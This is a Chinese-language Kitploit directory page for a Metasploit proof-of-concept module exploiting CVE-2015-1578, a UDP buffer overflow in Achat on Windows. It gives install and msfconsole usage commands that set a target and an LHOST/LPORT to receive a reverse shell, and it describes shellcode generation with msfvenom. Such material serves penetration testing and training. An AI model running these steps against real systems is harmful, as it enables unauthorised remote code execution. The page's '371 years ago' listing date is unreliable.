Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2015-1578-PoC-Metasploit — 这是一个针对CVE-2015-1578的概念验证型Metasploit模块漏洞利用,该漏洞是Windows上Achat 0.150 beta7中的一个缓冲区溢出漏洞。通过精心构造的UDP数据包,漏洞利用可实现远程代码执行。 | Kitploit
工具/GitHubGitHub/yaldobaoth/cve-2015-1578-poc-metasploit
渗透测试框架漏洞利用框架漏洞分析漏洞利用Shellcode远程访问工具Shellcode 生成Payload 开发二进制利用
GitHubyaldobaoth/cve-2015-1578-poc-metasploit

CVE-2015-1578-PoC-Metasploit

这是一个针对CVE-2015-1578的概念验证型Metasploit模块漏洞利用,该漏洞是Windows上Achat 0.150 beta7中的一个缓冲区溢出漏洞。通过精心构造的UDP数据包,漏洞利用可实现远程代码执行。

查看仓库
371年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2015-1578 Metasploit 模块

概述

这是针对 CVE-2015-1578 的一个 Metasploit 模块,该漏洞是 Windows 上 Achat 0.150 beta7 中的一个缓冲区溢出漏洞。利用该漏洞可通过特制的 UDP 数据包实现远程代码执行。

目的

本模块旨在作为 Metasploit 漏洞利用开发的一个简洁、最小且结构良好的示例。它演示了:

  • 通过 msfvenom 动态生成 Unicode 编码的 shellcode
  • 手动注入 payload(绕过 Metasploit 内部的 payload 编码器)
  • 基于 UDP 的简单投递机制
  • 使用自定义模块加载集成到 Metasploit 框架中

视频教程

Video Tutorial

依赖项

  • Metasploit 框架
  • 在 $PATH 中存在 msfvenom

功能特点

  • 使用 msfvenom 生成带有 x86/unicode_mixed 编码和自定义坏字符的 payload
  • 绕过 Metasploit 内置的 payload 编码系统,以规避编码器的限制

安装

./install.sh

然后启动 Metasploit 并运行:

reload_all
use exploit/windows/yaldobaoth/achat_bof

选项

  • RHOSTS – 目标 IP 地址(必填)
  • LHOST – 用于反向 Shell 的本地主机 IP(必填)
  • LPORT – 反向 Shell 的本地端口(默认:4444)
  • RPORT – 目标的远程 UDP 端口(默认:9256)

使用示例

msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run

这将:

  • 使用 msfvenom 生成一个兼容 Unicode 的反向 Shell payload
  • 通过 UDP 将其注入到存在漏洞的 Achat 缓冲区中
  • 在指定的 LHOST:LPORT 上监听 Shell
下载工具